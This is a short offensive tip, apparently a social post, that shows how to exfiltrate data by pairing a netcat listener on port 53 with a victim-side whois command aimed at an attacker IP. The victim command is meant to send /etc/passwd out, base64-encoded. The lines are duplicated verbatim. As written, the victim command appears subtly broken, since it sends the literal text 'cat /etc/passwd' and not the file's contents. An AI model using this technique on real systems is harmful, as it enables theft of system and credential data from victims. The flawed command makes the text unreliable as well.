Have limited ways to exfiltrate data? Use Whois!
attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64